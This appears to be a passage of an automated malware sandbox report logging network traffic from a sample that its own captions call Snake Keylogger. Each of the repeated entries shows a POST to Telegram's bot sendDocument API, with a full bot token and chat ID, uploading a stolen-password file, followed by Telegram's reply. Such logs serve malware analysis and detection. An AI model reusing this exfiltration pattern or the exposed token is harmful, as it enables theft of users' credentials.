                                                                    2022-06-26 07:34:22 UTC410OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 32 38 35 34 34 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575712854476Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:23 UTC411INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:23 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:23 UTC411INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67024,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228863,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    244192.168.2.550155149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:23 UTC412OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575712c806a4
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:23 UTC412OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 32 63 38 30 36 61 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575712c806a4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:23 UTC412INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:23 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:23 UTC413INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67025,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228863,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    245192.168.2.550156149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:23 UTC413OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757130d2b62
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:23 UTC414OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 33 30 64 32 62 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757130d2b62Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:24 UTC414INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:24 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:24 UTC414INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67027,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228863,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    246192.168.2.550158149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:24 UTC415OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575713524e97
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:24 UTC415OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 33 35 32 34 65 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575713524e97Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:24 UTC416INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:24 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:24 UTC416INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67028,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228864,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    247192.168.2.550159149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:24 UTC417OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5757139e9a3d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:24 UTC417OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 33 39 65 39 61 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5757139e9a3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:24 UTC417INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:24 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:24 UTC418INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67029,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228864,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    248192.168.2.550160149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:25 UTC418OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575713dc96af
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:25 UTC419OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 33 64 63 39 36 61 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575713dc96afContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:25 UTC419INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:25 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:25 UTC420INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67030,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228865,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    249192.168.2.550161149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:25 UTC420OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da575714457e05
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:25 UTC420OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 34 34 35 37 65 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da575714457e05Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:26 UTC421INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:26 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:26 UTC421INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67031,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228865,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    25192.168.2.549793149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:48 UTC42OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756da5e9696
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
